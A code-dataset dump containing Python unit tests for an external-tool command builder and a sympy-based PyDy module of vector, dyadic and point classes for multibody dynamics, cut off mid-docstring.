test___build_command___simple_command(self):\n expected_escaped_command = [\"tool\", \"param1\", \"param2\", \"-o\", \"out\", \"-i\", \"in\"]\n actual_escaped_command = ExternalTool._build_command(\n \"tool\", \"-i in\", \"-o out\", \"param1 param2\"\n )\n assert expected_escaped_command == actual_escaped_command\n\n def test___build_command___single_quote_escaped(self):\n expected_escaped_command = [\n \"tool\",\n \"params\",\n \"with\",\n \"escaped arg\",\n \"-o\",\n \"escaped out\",\n \"-i\",\n \"escaped in\",\n ]\n actual_escaped_command = ExternalTool._build_command(\n \"tool\", \"-i 'escaped in'\", \"-o 'escaped out'\", \"params with 'escaped arg'\"\n )\n assert expected_escaped_command == actual_escaped_command\n\n def test___build_command___double_quote_escaped(self):\n expected_escaped_command = [\n \"tool\",\n \"params\",\n \"with\",\n \"escaped arg\",\n \"-o\",\n \"escaped out\",\n \"-i\",\n \"escaped in\",\n ]\n actual_escaped_command = ExternalTool._build_command(\n \"tool\", '-i \"escaped in\"', '-o \"escaped out\"', 'params with \"escaped arg\"'\n )\n assert expected_escaped_command == actual_escaped_command\n\n def test___run(self):\n logsdir = repo_root / \"tests/helpers/logs\"\n logsdir.mkdir(parents=True, exist_ok=True)\n for file in logsdir.iterdir():\n file.unlink()\n\n python_script = str(repo_root / \"tests/helpers/run_test.py\")\n external_tool = ExternalTool(\n sys.executable,\n \"input\",\n \"output\",\n python_script,\n logsdir,\n )\n\n external_tool.run()\n\n out_file = glob.glob(f\"{logsdir}/*.out\")[0]\n with open(out_file) as out_file_fh:\n lines = out_file_fh.readlines()\n assert lines == [\"out\\n\"]\n\n err_file = glob.glob(f\"{logsdir}/*.err\")[0]\n with open(err_file) as err_file_fh:\n lines = err_file_fh.readlines()\n assert lines == [\n \"err\\n\",\n f\"Command line: {sys.executable} {python_script} output input\\n\",\n ]\n","repo_name":"mbhall88/tbpore","sub_path":"tests/test_external_tools.py","file_name":"test_external_tools.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"3038453434","text":"import time\n\nfrom sympy import (Symbol, symbols, Basic, Function, Mul, Pow, Matrix, sin,\n cos, tan, cot, S, eye, Add, trigsimp, expand, pretty, Eq, collect, sqrt,\n sympify, factor, zeros, simplify, solve_linear_system, ratsimp,\n powsimp, block_diag, Derivative, Expr)\nfrom sympy.printing.pretty.pretty import PrettyPrinter\nfrom sympy.printing.str import StrPrinter\n\nfrom common import e1, e2, e3, zero, t\n\nBasic.__str__ = lambda self: PyDyStrPrinter().doprint(self)\nBasic.__repr__ = lambda self: PyDyStrPrinter().doprint(self)\nMatrix.__str__ = lambda self: PyDyStrPrinter().doprint(self)\n\nclass UnitVector(Expr):\n \"\"\"A standard unit vector with a symbolic and a numeric representation.\n \"\"\"\n\n def __init__(self, frame, i=0): #=-1,num=None):\n self.frame = frame # Parent reference frame\n self.common_frames = set([frame])\n self.i = i\n self.v = {}\n s = frame.name\n if i == 1:\n self.v['sym'] = Symbol(s.lower()+str(i))\n self.v['num'] = e1\n elif i == 2:\n self.v['sym'] = Symbol(s.lower()+str(i))\n self.v['num'] = e2\n elif i == 3:\n self.v['sym'] = Symbol(s.lower()+str(i))\n self.v['num'] = e3\n elif i == 0:\n self.v['sym'] = Symbol(s.lower()+str(0))\n self.v['num'] = zero\n\n def __str__(self):\n return PyDyStrPrinter().doprint(self)\n\n def __repr__(self):\n return PyDyStrPrinter().doprint(self)\n\n def __cmp__(self, other):\n if isinstance(other, UnitVector):\n if self.frame == other.frame:\n return cmp(self.i, other.i)\n else:\n return cmp(len(self.frame.ref_frame_list),\n len(other.frame.ref_frame_list))\n else:\n raise NotImplementedError()\n\n def __eq__(self, other):\n if isinstance(other, UnitVector):\n if other.frame == self.frame:\n return (self.v['num'] == other.v['num'])\n else:\n other_selfframe = other.express(self.frame)\n if isinstance(other_selfframe, UnitVector):\n return (self.v['num'] == other_selfframe.v['num'])\n else:\n return False\n elif isinstance(other, Vector):\n other_selfframe = other.express(self.frame)\n if isinstance(other_selfframe, UnitVector):\n return (self.v['num'] == other_selfframe.v['num'])\n else:\n return False\n elif isinstance(other, (Add, Mul)):\n other_as_Vector = Vector(other)\n return (self == other_as_Vector)\n else:\n return False\n\n def __mul__(self, other):\n if isinstance(other, Dyad):\n return NotImplemented\n else:\n return Expr.__mul__(self, other)\n\n def __neg__(self):\n return Vector({self: -1})\n\n def express(self, frame):\n \"\"\"Express a UnitVector in a different reference frame.\n \"\"\"\n\n if self.frame == frame:\n return self\n else:\n frame_list = self.frame.get_frames_list(frame)\n if len(self.common_frames) > 1:\n # Means that self is fixed in more than one frame\n for cf in self.common_frames:\n if cf == self.frame:\n continue\n elif cf in frame_list:\n fl = cf.get_frames_list(frame)\n if len(fl) < len(frame_list):\n frame_list = fl\n matrices = frame_list[0].get_rot_matrices(frame_list[-1])\n else:\n matrices = self.frame.get_rot_matrices(frame)\n if len(matrices) == 1 and matrices[0]*self.v['num'] == self.v['num']:\n return frame[self.i]\n else:\n u = self.v['num']\n for m in reversed(matrices):\n u = m*u\n return Vector(u[0]*frame[1] + u[1]*frame[2] + u[2]*frame[3])\n\n def dot(self, other):\n \"\"\"UnitVector dot product.\n \"\"\"\n if isinstance(other, UnitVector):\n nrf = self.frame.NewtonianReferenceFrame\n if (self, other) in nrf.uv_dot_products:\n return nrf.uv_dot_products[(self, other)]\n elif (other, self) in nrf.uv_dot_products:\n return nrf.uv_dot_products[(other, self)]\n else:\n c = other.express(self.frame)\n if isinstance(c, UnitVector):\n dp = (self.v['num'].T * c.v['num'])[0]\n self.frame.NewtonianReferenceFrame.uv_dot_products[(self, \\\n other)] = dp\n return dp\n elif isinstance(c, Vector):\n s = c.dict.get(self, 0)\n self.frame.NewtonianReferenceFrame.uv_dot_products[(self, \\\n other)] = s\n return s\n else:\n raise NotImplementedError()\n elif isinstance(other, Vector):\n s = S(0)\n for k, c in other.dict.items():\n s += c*self.dot(k)\n return s\n elif isinstance(other, Dyad):\n return other.ldot(self)\n else:\n raise NotImplementedError()\n\n def cross(self, other):\n \"\"\"UnitVector cross product.\n \"\"\"\n def cross_with_Vector(self, c): # local function\n cp = {}\n for k, coef in c.dict.items():\n term = self.cross(k)\n if isinstance(term, UnitVector):\n cp[term] = cp.get(term, 0) + coef\n elif isinstance(term, Vector):\n for kt in term.dict:\n cp[kt] = cp.get(kt, 0) + coef*term.dict[kt]\n return Vector(cp)\n\n if isinstance(other, UnitVector):\n nrf = self.frame.NewtonianReferenceFrame\n if (self, other) in nrf.uv_cross_products:\n return nrf.uv_cross_products[(self, other)]\n elif (other, self) in nrf.uv_cross_products:\n return -nrf.uv_cross_products[(other, self)]\n else:\n c = other.express(self.frame)\n #print self.frame\n if isinstance(c, UnitVector):\n cp_list = [self.v['num'][1]*c.v['num'][2] - \\\n self.v['num'][2]*c.v['num'][1], \\\n -self.v['num'][0]*c.v['num'][2] + \\\n self.v['num'][2]*c.v['num'][0], \\\n self.v['num'][0]*c.v['num'][1] - \\\n self.v['num'][1]*c.v['num'][0]]\n cp = {}\n for (c, i) in zip(cp_list, [1, 2, 3]):\n if c != 0:\n cp.update({self.frame[i] : c})\n if len(cp) == 0:\n return Vector(0)\n elif len(cp) == 1:\n if cp.values()[0] == 1:\n return cp.keys()[0] # Return a UnitVector object\n else:\n return Vector(cp)\n else:\n cp1 = Vector(cp)\n cp2 = cp1.express(other.frame)\n if isinstance(cp2, UnitVector):\n return cp2\n else:\n for k in cp1.dict:\n cp1.dict[k] = trigsimp(cp1.dict[k])\n for k in cp2.dict:\n cp2.dict[k] = trigsimp(cp2.dict[k])\n if isinstance(cp1, UnitVector):\n return cp1\n elif isinstance(cp2, UnitVector):\n return cp2\n elif len(cp1.dict) <= len(cp2.dict):\n return cp1\n else:\n return cp2\n elif isinstance(c, Vector):\n cp1 = cross_with_Vector(self, c)\n cp2 = cp1.express(other.frame)\n if isinstance(cp1, UnitVector):\n return cp1\n elif isinstance(cp2, UnitVector):\n return cp2\n else:\n for k in cp1.dict:\n cp1.dict[k] = trigsimp(cp1.dict[k])\n for k in cp2.dict:\n cp2.dict[k] = trigsimp(cp2.dict[k])\n if isinstance(cp1, UnitVector):\n return cp1\n elif isinstance(cp2, UnitVector):\n return cp2\n elif len(cp1.dict) <= len(cp2.dict):\n return cp1\n else:\n return cp2\n elif isinstance(other, Vector):\n return cross_with_Vector(self, other)\n else:\n raise NotImplementedError()\n\n def dt(self, diff_frame):\n \"\"\"UnitVector time derivative.\n \"\"\"\n if isinstance(diff_frame, ReferenceFrame):\n if self.frame == diff_frame:\n return Vector(0)\n else:\n return cross(self.frame.ang_vel(diff_frame), self)\n else:\n raise TypeError(\"Must provide a ReferenceFrame to take the \\\n derivative in\")\n\nclass Dyad(object):\n \"\"\"General dyad expression.\n \"\"\"\n def __init__(self, v):\n \"\"\" v should be an additive expression of the form:\n (sympy expression)*UnitVector*UnitVector\n\n The sympy expression is optional, but typically would be an inertia\n scalar.\n \"\"\"\n self.dict = {}\n if isinstance(v, dict):\n self.dict = v\n elif v == 0 or v == {}:\n pass\n else:\n raise NotImplementedError()\n\n def __add__(self, other):\n if isinstance(other, Dyad):\n nd = {}\n for k, v in self.dict.items():\n nd[k] = v\n for k, v in other.dict.items():\n nd[k] = nd.get(k, 0) + v\n for k, v in nd.items():\n if v == 0:\n nd.pop(k)\n return Dyad(nd)\n\n def __neg__(self):\n nd = {}\n for k, v in self.dict.items():\n nd[k] = -v\n return Dyad(nd)\n\n def __sub__(self, other):\n if isinstance(other, Dyad):\n return self.__add__(other.__neg__())\n\n def subs(self, subs_dict):\n \"\"\"Substitute into the scalar coeffiecients of each dyadic term.\n \"\"\"\n nd = {}\n for k, v in self.dict.items():\n nd[k] = v.subs(subs_dict)\n return Dyad(nd)\n\n def expand(self):\n \"\"\"Expand scalar coefficients of each dyadic term.\n \"\"\"\n nd = {}\n for k, v in self.dict.items():\n nd[k] = v.expand()\n return Dyad(nd)\n\n def n(self):\n \"\"\"Numerically evaluate each scalar coefficient.\n \"\"\"\n nd = {}\n for k, v in self.dict.items():\n nd[k] = v.n()\n return Dyad(nd)\n\n\n def ldot(self, other):\n \"\"\"Multplitcation by a UnitVector/Vector on the left.\n v * Dyad\n\n Returns a UnitVector / Vector\n \"\"\"\n vec_dict = {}\n if isinstance(other, (UnitVector, Vector)):\n for d_term, coeff in self.dict.items():\n scalar_part = coeff*other.dot(d_term.args[0])\n if d_term.is_Mul:\n vec_dict[d_term.args[1]] = vec_dict.get(d_term.args[1], 0) \\\n + scalar_part\n elif d_term.is_Pow:\n vec_dict[d_term.args[0]] = (vec_dict.get(d_term.args[0], 0)\n + scalar_part)\n else:\n raise NotImplementedError()\n return Vector(vec_dict)\n\n def rdot(self, other):\n \"\"\"Multplitcation by a UnitVector/Vector on the right.\n Dyad * v\n\n Returns a UnitVector / Vector\n \"\"\"\n vec_dict = {}\n if isinstance(other, (UnitVector, Vector)):\n for d_term, coeff in self.dict.items():\n if d_term.is_Mul:\n #print d_term\n scalar_part = coeff*other.dot(d_term.args[1])\n vec_dict[d_term.args[0]] = (vec_dict.get(d_term.args[0], 0)\n + scalar_part)\n elif d_term.is_Pow:\n #print d_term.args\n scalar_part = coeff*other.dot(d_term.args[0])\n vec_dict[d_term.args[0]] = (vec_dict.get(d_term.args[0], 0)\n + scalar_part)\n else:\n raise NotImplementedError()\n\n return Vector(vec_dict)\n\n def __str__(self):\n return PyDyStrPrinter().doprint(self)\n\n def express(self, frame):\n \"\"\"Express a Dyad with Unit Vectors fixed in a specified frame.\"\"\"\n dyad_dict = {}\n for d_term, coeff in self.dict.items():\n if d_term.is_Mul: # Case of A[1]*A[2]\n t1 = d_term.args[0].express(frame)\n t2 = d_term.args[1].express(frame)\n if isinstance(t1, UnitVector) and isinstance(t2, UnitVector):\n dyad_dict[t1*t2] = dyad_dict.get(t1*t2, 0) + coeff\n elif isinstance(t1, UnitVector) and isinstance(t2, Vector):\n for k, v in t2.dict.items():\n dyad_dict[t1*k] = dyad_dict.get(t1*k, 0) + coeff*v\n elif isinstance(t1, Vector) and isinstance(t2, UnitVector):\n for k, v in t1.dict.items():\n dyad_dict[k*t2] = dyad_dict.get(k*t2, 0) + coeff*v\n elif isinstance(t1, Vector) and isinstance(t2, Vector):\n for k1, v1 in t1.dict.items():\n for k2, v2 in t2.dict.items():\n dyad_dict[k1*k2] = dyad_dict.get(k1*k2, 0) + coeff*v1*v2\n if d_term.is_Pow:\n t1 = d_term.args[0].express(frame)\n if isinstance(t1, UnitVector):\n dyad_dict[t1**2] = dyad_dict.get(t1**2, 0) + coeff\n elif isinstance(t1, Vector):\n t2 = Vector(t1.dict) # make a copy\n for k1, v1 in t1.dict.items():\n for k2, v2 in t2.dict.items():\n dyad_dict[k1*k2] = dyad_dict.get(k1*k2, 0) + coeff*v1*v2\n return Dyad(dyad_dict)\n\nclass Inertia(Dyad):\n \"\"\"Inertia dyadic.\n \"\"\"\n def __init__(self, F, scalars):\n \"\"\"Specify frame, scalars as:\n frame - ReferenceFrame\n scalars - List or tuple of I11, I22, I33, I12, I23, I13 inertia scalars\n \"\"\"\n I11, I22, I33, I12, I23, I13 = scalars\n self.dict = {}\n for i, s in enumerate(scalars):\n if s == 0:\n continue\n if i <= 2:\n self.dict[F[i+1]*F[i+1]] = s\n elif i == 3:\n self.dict[F[1]*F[2]] = s\n self.dict[F[2]*F[1]] = s\n elif i == 4:\n self.dict[F[2]*F[3]] = s\n self.dict[F[3]*F[2]] = s\n elif i == 5:\n self.dict[F[1]*F[3]] = s\n self.dict[F[3]*F[1]] = s\n\nclass Vector(Basic):\n \"\"\"Symbolic vector expression.\n\n Internally represented as a dictionary whose keys are UnitVectors and whose\n values are the corresponding coefficient of that UnitVector.\n\n Example\n\n ::\n\n >>> N = ReferenceFrame(\"N\")\n >>> x, y, z = symbols('x y z')\n >>> v = Vector(x*N[1] + y*N[2] + z*N[3])\n >>> v.dict == {N[1]: x, N[2]: y, N[3]: z}\n True\n\n \"\"\"\n\n def __init__(self, v):\n \"\"\"Initialize a Vector object.\n\n Example\n\n\n Method 1:\n\n ::\n\n >>> N = ReferenceFrame(\"N\")\n >>> x, y, z = symbols('x y z')\n >>> v = Vector(x*N[1] + y*N[2] + z*N[3])\n >>> v\n x*n1> + y*n2> + z*n3>\n\n\n Method 2:\n\n ::\n\n >>> v = Vector({N[1]: x, N[2]: y, N[3]: z})\n >>> v\n x*n1> + y*n2> + z*n3>\n\n See also\n \"\"\"\n\n if isinstance(v, dict):\n for k in v.keys():\n v[k] = sympify(v[k])\n if v[k] == 0: v.pop(k)\n self.dict = v\n elif isinstance(v, Vector):\n self.dict = v.dict\n else:\n vdict = self.parse_terms(v)\n for k in vdict.keys():\n vdict[k] = sympify(vdict[k])\n if vdict[k] == 0: vdict.pop(k)\n self.dict = vdict\n\n def __str__(self):\n return PyDyStrPrinter().doprint(self)\n\n def __repr__(self):\n return PyDyStrPrinter().doprint(self)\n\n def __add__(self, other):\n \"\"\"Add two Vector objects.\n\n Example\n\n\n ::\n\n >>> N = ReferenceFrame('N')\n >>> v1 = Vector(2*N[1])\n >>> v2 = Vector(N[1] + 3*N[2])\n >>> v3 = v1 + v2\n >>> v3\n 3*n1> + 3*n2>\n\n See Also\n\n L{__sub__}\n \"\"\"\n if isinstance(other, Vector):\n sum = dict([(k, self.dict.get(k, 0) + other.dict.get(k, 0)) for k in\n (self.dict.keys() + other.dict.keys())])\n\n if len(sum) == 1 and sum[sum.keys()[0]] == 1:\n return sum.keys()[0]\n else:\n return Vector(sum)\n elif isinstance(other, UnitVector):\n return self.__add__(Vector({other: S(1)}))\n elif isinstance(other, (Add, Mul)):\n return self.__add__(Vector(other))\n else:\n raise NotImplementedError()\n\n def __sub__(self, other):\n \"\"\"Subtract two Vector objects.\n\n Example\n\n ::\n\n >>> N = ReferenceFrame('N')\n >>> v1 = Vector(2*N[1])\n >>> v2 = Vector(N[1] + 3*N[2])\n >>> v3 = v1 - v2\n >>> v3\n n1> - 3*n2>\n\n See Also\n\n L{__add__}\n \"\"\"\n if isinstance(other, Vector):\n dif = dict([(k, self.dict.get(k, 0) - other.dict.get(k, 0)) for k in\n (self.dict.keys() + other.dict.keys())])\n if len(dif) == 1 and dif[dif.keys()[0]] == 1:\n return dif.keys()[0]\n else:\n return Vector(dif)\n elif isinstance(other, UnitVector):\n return self.__sub__(Vector({other: S(1)}))\n elif isinstance(other, (Add, Mul)):\n return self.__sub__(Vector(other))\n else:\n raise NotImplementedError()\n\n def __eq__(self, other):\n \"\"\"Compares two Vector objects for equality.\n \"\"\"\n if isinstance(other, Vector):\n if self.dict == other.dict: # Easy case\n return True\n else: # More difficult case\n l1 = len(self.dict)\n k1 = self.dict.keys()\n l2 = len(other.dict)\n k2 = other.dict.keys()\n if l1 == 0 or l2 == 0:\n return False\n else:\n self_in_first_key_frame = self.express(k1[0].frame)\n other_in_first_key_frame = other.express(k1[0].frame)\n # Now the two vectors are both expressed in the same\n # coordinate frame\n if self_in_first_key_frame.dict == \\\n other_in_first_key_frame.dict:\n return True\n else:\n return False\n elif isinstance(other, UnitVector):\n v = self.express(other.frame)\n if isinstance(v, UnitVector):\n if v == other: return True\n else:\n return False\n else:\n other_as_Vector = Vector(other)\n return self == other_as_Vector\n\n \"\"\"\n def __rmul__(self, other):\n if isinstance(other, Dyad):\n return NotImplemented\n elif isinstance(other, Basic) and not isinstance(other, UnitVector):\n product = {}\n for k in self.dict:\n product[k] = other*self.dict[k]\n return Vector(product)\n else:\n return NotImplemented\n\n def __mul__(self, other):\n if isinstance(other, Dyad):\n return NotImplemented\n else:\n return Basic.__mul__(self, other)\n\n def __lmul__(self, other):\n if isinstance(other, Dyad):\n return NotImplemented\n elif isinstance(other, Symbol):\n prod = {}\n for k in self.dict:\n prod[k] = other*self.dict[k]\n else:\n return Basic.__mul__(self, other)\n \"\"\"\n\n def __neg__(self):\n return Vector(dict([(k, -self.dict[k]) for k in self.dict]))\n\n def coeffv(self, scalar):\n \"\"\"Vector coefficient of a scalar\n \"\"\"\n\n return Vector(dict([(k, self.dict[k].coeff(scalar)) for k in\n self.dict if self.dict[k].coeff(scalar) != None]))\n\n\n def cross(self, other):\n if isinstance(other, Vector):\n vcp = {}\n for k in self.dict:\n for ko in other.dict:\n kcrossko = k.cross(ko)\n if isinstance(kcrossko, UnitVector):\n vcp[kcrossko] = (vcp.get(kcrossko, 0) +\n self.dict[k]*other.dict[ko])\n else:\n for uv_term in kcrossko.dict:\n vcp[uv_term] = (vcp.get(uv_term, 0) +\n self.dict[k]*other.dict[ko]*\n kcrossko.dict[uv_term])\n return Vector(vcp)\n elif isinstance(other, UnitVector):\n vcp = {}\n for k in self.dict:\n k_cross_other = k.cross(other)\n if isinstance(k_cross_other, UnitVector):\n vcp[k_cross_other] = (vcp.get(k_cross_other, 0) +\n self.dict[k])\n else:\n for uv_term in k_cross_other.dict:\n vcp[uv_term] = (vcp.get(uv_term, 0) +\n self.dict[k]*k_cross_other.dict[uv_term])\n return Vector(vcp)\n elif isinstance(other, (Add, Mul)):\n return self.cross(Vector(other))\n else:\n raise NotImplementedError()\n\n def dot(self, other):\n \"\"\"Vector dot product.\n \"\"\"\n if isinstance(other, Vector):\n s = S(0)\n for k in self.dict:\n s += sum([self.dict[k]*other.dict[ko]*k.dot(ko) for ko in\n other.dict])\n return s\n elif isinstance(other, UnitVector):\n s = sum([self.dict[k]*k.dot(other) for k in self.dict])\n return s\n elif isinstance(other, (Add, Mul)):\n return self.dot(Vector(other))\n elif isinstance(other, Dyad):\n return other.ldot(self)\n else:\n raise NotImplementedError()\n\n def dt(self, frame):\n if isinstance(frame, ReferenceFrame):\n dt_self = {}\n for k in self.dict:\n # First term comes from time differentiating in the frame of\n # the UnitVector frame of k\n dt_self[k] = dt_self.get(k, 0) + (self.dict[k]).diff(t)\n # Second term comes from the omega cross term\n t2 = k.frame.ang_vel(frame).cross(k)\n if isinstance(t2, UnitVector):\n dt_self[k] = dt_self.get(k, 0) + self.dict[k]\n else: # Must be a Vector\n for term in t2.dict:\n dt_self[term] = (dt_self.get(term, 0) +\n self.dict[k]*t2.dict[term])\n if len(dt_self) == 1:\n if dt_self.values()[0] == 1:\n return dt_self.keys()[0] # Return a UnitVector\n else:\n return Vector(dt_self)\n else:\n return Vector(dt_self)\n\n def express(self, frame):\n \"\"\"Expresses a Vector with UnitVectors fixed in the specified frame.\n \"\"\"\n\n new = {}\n\n for uv in self.dict.keys():\n # Convert each unit vector term to the desired frame\n uv_in_frame = uv.express(frame)\n\n # Case for UnitVectors\n if isinstance(uv_in_frame, UnitVector):\n new[uv_in_frame] = new.get(uv_in_frame, 0) + self.dict[uv]\n\n # Case for Vectors\n elif isinstance(uv_in_frame, Vector):\n # Go through each term\n for uv_term, coef in uv_in_frame.dict.items():\n new[uv_term] = (new.get(uv_term, 0) +\n self.dict[uv]*coef)\n\n for uv in new.keys():\n new[uv] = new[uv].expand().subs(uv.frame.NewtonianReferenceFrame.csqrd_dict).expand()\n #new[uv] = expand(trigsimp(new[uv]))\n #new[uv] = trigsimp(expand(trigsimp(new[uv])))\n if new[uv] == 0: new.pop(uv)\n\n if len(new) == 1 and new.values()[0] == 1:\n return new.keys()[0]\n else:\n return Vector(new)\n\n @property\n def mag(self):\n \"\"\"Magnitude of a Vector.\n \"\"\"\n return sqrt(self.mag_sqr)\n\n @property\n def mag_sqr(self):\n \"\"\"Magnitude squared of a Vector.\n \"\"\"\n m = 0\n s = set([])\n for k1, k2 in ((x,y) for x in self.dict for y in self.dict):\n if (k2, k1) in s:\n continue\n else:\n s.add((k1, k2))\n for k1, k2 in s:\n if k1 == k2:\n #m += expand(self.dict[k1]**2)\n m += self.dict[k1]**2\n else:\n #m += 2*expand(self.dict[k1]*self.dict[k2]*dot(k1, k2))\n m += 2*self.dict[k1]*self.dict[k2]*dot(k1, k2)\n\n # Try to factor things if possible\n \"\"\"\n if isinstance(m, Add):\n trigterms = m.atoms(sin, cos)\n replacements = []\n for i, t in enumerate(trigterms):\n replacements.append(Symbol('Trig%d' % i, dummy=True))\n subsdict = dict(zip(trigterms, replacements))\n rsubsdict = dict(zip(replacements, trigterms))\n trigadd = []\n otheradd = []\n for arg in m.args:\n if arg.atoms(sin, cos):\n trigadd.append(arg)\n else:\n otheradd.append(arg)\n trigexpr = S(0)\n otherexpr = S(0)\n for term in trigadd: trigexpr += term\n for term in otheradd: otherexpr += term\n trigexprs = trigexpr.subs(subsdict)\n trigexprsf = factor(trigexprs)\n trigexprf = trigexprsf.subs(rsubsdict)\n m = trigexprf + otherexpr\n #m = trigexpr + otherexpr\n \"\"\"\n return m\n\n @property\n def normalized(self):\n v = Vector(0)\n m = self.mag\n for k in self.dict:\n v.dict[k] = self.dict[k] / m\n return v\n\n def parse_terms(self, v):\n \"\"\"\n Given a Sympy expression with UnitVector terms, return a dictionary\n whose keys are the UnitVectors and whose values are the coeefficients\n of the UnitVectors\n \"\"\"\n\n if v == 0:\n return {}\n elif isinstance(v, UnitVector):\n return {v: S(1)}\n elif isinstance(v, Vector):\n return v.dict\n elif isinstance(v, Mul):\n v = v.expand() # Could expand out to an Add instance\n if isinstance(v, Add):\n return self.parse_terms(v) # If this happens, reparse\n elif isinstance(v, Mul): # Otherwise it is still a Mul instance\n \"\"\"if v.atoms(Vector):\n i = v.args.index(list(v.atoms(Vector))[0])\n scalarpart = S(1)\n for j, term in enumerate(v.args):\n if j == i: continue\n else:\n scalarpart *= term\n newvdict = {}\n for k in v.args[i].dict:\n newvdict[k] = scalarpart*v.args[i].dict[k]\n return newvdict\n \"\"\"\n args = v.args\n term_types_list = [type(terms) for terms in args]\n if UnitVector in term_types_list:\n i = term_types_list.index(UnitVector)\n coefs = args[:i] + args[i+1:]\n prod_coefs = S(1)\n for p in coefs:\n prod_coefs *= p\n return {args[i]: prod_coefs}\n elif Vector in term_types_list:\n i = term_types_list.index(Vector)\n coefs = args[:i] + args[i+1:]\n prod_coefs = S(1)\n for p in coefs:\n prod_coefs *= p\n for k in args[i].dict.keys():\n args[i].dict[k] *= prod_coefs\n return args[i].dict\n else:\n raise NotImplementedError()\n else:\n raise NotImplementedError()\n elif isinstance(v, Pow):\n v = v.expand()\n # I don't think this will ever be entered into.\n # You would have to have something like A[1]*A[2],\n # which isn't a valid vector expression.\n # Or q1*q2, which is a scalar expression.\n for b in v.args:\n if isinstance(b, UnitVector):\n return {b: v.coeff(b)}\n elif isinstance(v, Add):\n v = v.expand()\n terms = {}\n for add_term in v.args:\n if isinstance(add_term, (Mul, Pow)):\n add_term_dict = self.parse_terms(add_term)\n elif isinstance(add_term, UnitVector):\n add_term_dict = {add_term: S(1)}\n elif isinstance(add_term, Vector):\n add_term_dict = add_term.dict\n else:\n raise NotImplementedError()\n for k in add_term_dict:\n terms[k] = terms.get(k, 0) + add_term_dict[k]\n return terms\n else:\n return NotImplemented\n\n def partials(self, u_list):\n \"\"\"Computes partial velocities.\n \"\"\"\n return [self.coeffv(u) for u in u_list]\n\n def subs(self, subs_dict):\n return Vector(dict([(k, self.dict[k].subs(subs_dict)) for k in\n self.dict]))\n\n def expandv(self):\n \"\"\"Expands each coefficient of a Vector's UnitVectors\n \"\"\"\n ex = {}\n for uv, c in self.dict.items():\n ex[uv] = c.expand()\n return Vector(ex)\n\nclass Point(object):\n \"\"\"\n A class for keeping track of the relative position, velocity, and\n acceleration of points. Points can be created in three ways:\n\n Method 1:\n P = Point('P')\n\n Method 2:\n Q = P.locate('Q', r)\n\n Method 3:\n Q = P.locate('Q', r, frame)\n\n Methods 2 and 3 automatically form the velocity and acceleration of the new\n point Q relative to the parent point P.\n\n Method 1 is used to create the 'base' point from which all other points are\n derived. Method 1 is automatically called when a 'base' reference frame is\n created, this point corresponds to what is commonly known as the inertial\n origin, and this syntax is typically never used explicitly. Method 2\n creates a new point Q, located relative to point P by the Vector r. Method\n 3 creates a new point Q, located relative to point P by the Vector r, but\n it is assumed that this point is fixed in frame, so that the velocity of Q\n relative to P is the velocity of P plus the cross product of the angular\n velocity of frame relative to the Inertial Frame with r.\n \"\"\"\n\n def __init__(self, name, relativeposition=None, parentpoint=None,\n fixedinframe=None, mass=None, force=None):\n # When instantiated by ReferenceFrame\n if not any([relativeposition, parentpoint]):\n self.name = name\n self.point_list = [self]\n self.pos = {self: Vector(0)}\n self._vrel = Vector(0)\n self.NewtonianFrame = fixedinframe\n self._fixedin = set([fixedinframe])\n self.parentpoint = None\n self.children = []\n self.mass = 0\n self.force = Vector(0)\n # When instantiated by locate method\n elif all([name, relativeposition, parentpoint]):\n relativeposition = Vector(relativeposition)\n self.name = name\n self.parentpoint = parentpoint\n self.children = []\n parentpoint.children.append(self)\n # Initialize the inertial velocity, relative to the parent point\n self._vrel = {}\n # Assign the vector pointing back to the parent to the new point's\n # position\n self.pos = {parentpoint: -relativeposition}\n # Add the position vector pointing from the parent to the new point\n # to the parent's pos dictionary\n parentpoint.pos[self] = relativeposition\n # Add self to the begin of the parent's point list\n self.point_list = [self] + parentpoint.point_list\n # Copy the Newtonian frame from the parent point.\n self.NewtonianFrame = parentpoint.NewtonianFrame\n # Set the mass and force\n self.mass = 0 if mass == None else mass\n self.force = Vector(0) if force == None else force\n # If an optional frame argument is specified, append it to the\n # _fixedin list of the parent and create the list for the new point\n if isinstance(fixedinframe, ReferenceFrame):\n parentpoint._fixedin.add(fixedinframe)\n self._fixedin = set([fixedinframe])\n self._vrel = cross(fixedinframe.ang_vel(self.NewtonianFrame),\n relativeposition)\n elif fixedinframe == None:\n self._fixedin = set([])\n self._vrel = relativeposition.dt(self.NewtonianFrame)\n else:\n raise TypeError('fixedinframe must be a ReferenceFrame type')\n else:\n raise NotImplementedError()\n\n def apply_force(self, force, other=None, reset=False):\n \"\"\"Apply force to a point or particle.\n\n Can be used to apply a force to a point or particle.\n\n Repeated calls to apply_force are additive.\n\n If optional argument other is specified, a torque or equal magnitude\n but opposite sign will applied to the other point.\n\n If you need to reset the applied force to zero, use optional parameter\n reset=True\n \"\"\"\n if other==None:\n if reset==False:\n self.force += Vector(force)\n elif reset==True:\n self.force = Vector(force)\n else:\n raise TypeError('reset must be a boolean')\n elif isinstance(other, ReferenceFrame):\n if reset==False:\n force = Vector(force)\n self.force += force\n other.force -= force\n elif reset==True:\n force = Vector(force)\n self.force = force\n other.force = -force\n else:\n raise TypeError('reset must be a boolean')\n else:\n raise TypeError('other must be a ReferenceFrame')\n\n def locate(self, name, r, frame=None, mass=None, force=None):\n \"\"\"Returns a new Point located relative to the parent point.\n\n Introduces the concept of a point fixed in a frame.\n\n Method 1:\n\n P1 = N.O.locate('P1', r)\n\n Method 2:\n\n P2 = N.O.locate('P1', r, frame)\n\n Both methods assign the relative position vector r in an identical way,\n they differ in how the velocity of the point is determined. Method 1\n takes the time derivative of the supplied vector r in the\n NewtonianFrame. Method 2 treats the new point as fixed in the supplied\n frame, so the velocity is calculated as the cross product of the\n angular velocity of frame relative to the NewtonianFrame with the\n supplied position vector r.\n \"\"\"\n r = Vector(r)\n newpoint = Point(name, relativeposition=r, \\\n parentpoint=self, fixedinframe=frame)\n newpoint.mass = mass if mass is not None else 0\n newpoint.force = Vector(force) if force is not None else Vector(0)\n return newpoint\n\n def rel(self, other):\n \"\"\"\n Returns the position from Point other to Point self, i.e., the position\n of self relative to other.\n \"\"\"\n if isinstance(other, Point):\n pl = self.get_point_list(other)\n pos = Vector(0)\n for i, p in enumerate(pl[:-1]):\n pos -= pl[i].pos[pl[i+1]]\n return pos\n elif other is None:\n return Vector(0)\n\n def vel(self, point=None, frame=None):\n \"\"\"Calculate the velocity of a point.\n\n Used without arguments, vel() returns the velocity of self\n 